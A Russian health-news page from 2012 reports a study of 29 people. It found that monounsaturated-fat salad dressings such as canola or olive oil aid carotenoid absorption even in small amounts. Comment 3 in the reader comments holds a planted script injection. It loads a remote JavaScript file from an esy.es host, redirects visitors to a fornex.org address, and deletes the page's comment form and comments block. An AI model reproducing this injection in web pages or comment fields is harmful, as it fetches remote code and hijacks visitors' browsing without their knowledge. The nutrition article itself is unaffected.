Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ученые выяснили, чем вы р...  >>  Ученые выяснили, чем вы рискуете, используя обезжиренные соусы. Требует ли красота таких жертв?
 
Обратная связь
 

Ученые выяснили, чем вы рискуете, используя обезжиренные соусы. Требует ли красота таких жертв?

Размер шрифта
02 августа 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Для того чтобы извлечь из овощей и фруктов максимальное количество питательных веществ, необходимо правильно выбрать соус. Если заправить салат обезжиренным соусом, его калорийность снизится, но ради этого придется пожертвовать некоторыми полезными веществами.

Суть исследования

В исследовании приняли участие 29 человек, которых кормили салатами, заправленными разными соусами: на основе насыщенных, мононенасыщенных и полиненасыщенных жиров. В качестве источника насыщенных жиров использовалось сливочное масло, мононенасыщенных – каноловое (рапсовое) масло, полиненасыщенных – кукурузное масло.

Всасывание полезных веществ – жирорастворимых каротиноидов – контролировали с помощью измерения их концентрации в крови. Эти вещества снижают риск развития рака, сердечно-сосудистых заболеваний и заболеваний сетчатки глаза.

Для заправки каждого салата использовались три разные порции соуса. Всасывание каротиноидов при использовании соуса на основе полиненасыщенных жиров зависело от количества соуса: чем больше соуса, тем больше каротиноидов всасывается при употреблении овощей. Всасывание каротиноидов при использовании соуса на основе насыщенных жиров также зависело от количества соуса, но в меньшей степени. Однако всасывание каротиноидов не зависит от количества соуса на основе мононенасыщенных жиров.

Результаты

Согласно данным исследования, для полноценного всасывания каротиноидов требуется минимальное количество соуса на основе мононенасыщенных жиров, тогда как соусов на основе насыщенных и полиненасыщенных жиров требуется больше. Даже небольшое количество мононенасыщенных жиров позволит получить достаточно каротиноидов.

Конечно, для заправки салатов можно использовать небольшое количество соуса на основе насыщенных или полиненасыщенных жиров, однако, увеличение количества соуса приведет к существенному улучшению всасывания каротиноидов. Поэтому такие источники мононенасыщенных жиров, как каноловое или оливковое масло, идеально подходят для людей, которые следят за своей фигурой, но в то же время хотят извлекать из овощей максимальное количество питательных веществ.

Новые исследования

В дальнейшем ученые планируют продолжить работу по изучению особенностей всасывания питательных веществ. В частности, они хотят понять, как следует питаться, чтобы получить максимальное количество полезных веществ из пищи в течение дня.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

13 августа 2012 в 08:32

Комментарий удален за нарушение Правил общения

2 - genafirst12

27 мая 2015 в 17:18

Комментарий удален за нарушение Правил общения

3 - zzzzzz

30 июня 2015 в 23:38

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Бурый жир поможет похудеть   Вся правда о жире на животе   Трансжиры: как распознать врага?   Сливочное масло или маргарин?  
01 августа 2012Вы рискуете, используя обезжиренные соусы 27 февраля 2013Бурый жир поможет похудеть
 
20 июля 2012Кости можно делать из жира! 04 октября 2011Заплати налоги и ешь жирную пищу
 

Слайдшоу

1
Как выглядят 100 калорий
Суперперекусы меньше 200 калорий
От этой еды будет понос!

Тесты

1
Жиры, которые мы едим
Правильно ли вы худеете?
Что вы знаете о печени?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.